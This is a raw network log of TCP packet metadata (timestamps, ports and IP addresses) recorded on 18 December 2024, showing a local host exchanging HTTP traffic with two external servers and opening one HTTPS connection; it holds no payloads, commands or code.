Dec 18, 2024 13:38:20.871412039 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.871471882 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.872160912 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.872225046 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.872292042 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.872343063 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.873084068 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.873213053 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.873249054 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.873249054 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.874067068 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.874176025 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.874177933 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.874237061 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.874970913 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.875013113 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.875118017 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.875160933 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.875951052 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.876007080 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.876043081 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.876092911 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.876830101 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.876893997 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.876903057 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.876943111 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.877756119 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.877810001 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.877926111 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.877973080 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.878671885 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.878721952 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.878915071 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.878998041 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.879591942 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.879638910 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.879683971 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.879728079 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.880532980 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.880621910 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.880696058 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.880696058 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.881679058 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.881702900 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.881722927 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.881750107 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.882512093 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.882530928 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.882556915 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.882595062 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.883297920 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.883346081 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.883362055 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.883399963 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.884367943 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.884430885 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.884440899 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.884704113 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.885092020 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.885247946 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.885251999 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.885287046 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.886004925 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.886082888 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.886200905 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.886240005 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.886938095 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.887114048 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.887185097 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.887372017 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.887886047 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.887944937 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.887985945 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.888058901 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.888838053 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.888883114 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.888984919 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.889030933 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.889723063 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.889857054 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.889980078 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.890117884 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.890669107 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.890712976 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.890820026 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.890969038 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.891608000 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.891664028 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.891664028 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.891705036 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.892637014 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.892770052 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.892821074 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.893512011 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.893774033 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.893831968 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.894380093 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.894483089 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.894536018 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.895333052 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.895390034 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.895469904 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.895510912 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.896159887 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.896261930 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.040981054 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.041001081 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.041094065 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.041096926 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.041147947 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.041162014 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.041209936 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.041824102 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.041842937 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.041886091 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.041910887 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.042496920 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.042525053 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.042551041 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.043143988 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.043200016 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.043206930 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.043926001 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.043979883 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.043993950 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.044651985 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.044703007 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.044791937 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.044833899 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.045593023 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.045660973 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.045706034 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.046515942 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.046719074 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.046761036 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.047440052 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.047475100 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.047667980 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.048428059 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.048446894 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.048479080 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.048495054 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.049220085 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.049349070 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.049400091 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.050192118 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.050314903 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.050359964 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.051284075 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.051342964 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.051383972 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.052162886 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.052180052 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.052212000 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.052227974 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.053056955 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.053081036 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.053122044 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.053869963 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.053989887 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.054037094 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.054934025 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.054980993 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.055085897 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.056282997 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.056330919 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.056376934 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.057013988 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.057055950 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.057077885 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.057121038 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.058072090 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.058367968 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.058423996 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.059071064 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.059160948 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.059225082 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.060247898 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.060308933 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.060384989 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.061207056 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.061253071 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.061265945 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.061301947 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.062016010 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.062098980 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.062172890 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.062870026 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.062887907 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.062943935 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.063669920 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.063843966 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.063898087 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.065167904 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.065186024 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.065242052 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.065720081 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.065772057 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.065798044 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.065888882 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.066508055 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.066576958 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.066678047 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.066725016 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.067229033 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.067276955 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.067298889 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.067368031 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.068068981 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.068094015 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.068119049 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.068140984 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.068635941 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.068783998 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.068840027 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.069576025 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.069659948 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.069720984 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.070466995 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.070574045 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.070651054 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.071412086 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.071551085 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.071607113 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.072357893 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.072418928 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.072438002 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.073287010 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.073358059 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.073359013 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.073865891 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.074215889 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.074579000 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.074639082 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.075556040 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.075726032 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.075833082 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.076199055 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.076304913 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.076360941 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.076951027 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.077003956 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.077151060 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.077930927 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.077999115 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.078130007 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.078789949 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.078844070 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.078916073 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.079756021 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.079806089 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.079899073 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.079946041 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:21.080656052 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:21.081867933 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:23.308824062 CET	49709	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:23.309250116 CET	49711	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:23.429158926 CET	80	49711	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:23.429235935 CET	49711	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:23.429467916 CET	80	49709	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:23.429517031 CET	49709	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:23.429595947 CET	49711	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:23.549144030 CET	80	49711	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:24.917543888 CET	80	49711	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:24.917678118 CET	49711	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:24.986299038 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:24.986624002 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:25.106734037 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:25.106874943 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:25.107243061 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:25.107306004 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:25.150208950 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:25.271038055 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.298693895 CET	49713	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:26.298742056 CET	443	49713	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:26.298830986 CET	49713	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:26.328327894 CET	49713	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:26.328361034 CET	443	49713	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:26.434148073 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.434204102 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.434235096 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.434240103 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.434257030 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.434293985 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.434465885 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.434480906 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.434545040 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.434672117 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.434686899 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.434730053 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.434919119 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.434972048 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.434984922 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.434998989 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.435033083 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.435059071 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.553807974 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.553885937 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.554013968 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.554049015 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.557987928 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.558059931 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.626559973 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.626727104 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.626740932 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.626816034 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.630748034 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.630820990 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.630948067 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.631001949 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.639116049 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.639153957 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.639200926 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.639249086 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.647476912 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.647566080 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.647711992 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.647772074 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.655914068 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.656017065 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.656021118 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.656075001 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.664343119 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.664372921 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.664458990 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.664484024 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.672734976 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.672888994 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.672913074 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.672986984 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.681128979 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.681227922 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.681231976 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.681282043 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.689554930 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.689631939 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.689841986 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.698035002 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.698142052 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.698179007 CET	80	49712	31.41.244.11	192.168.2.8
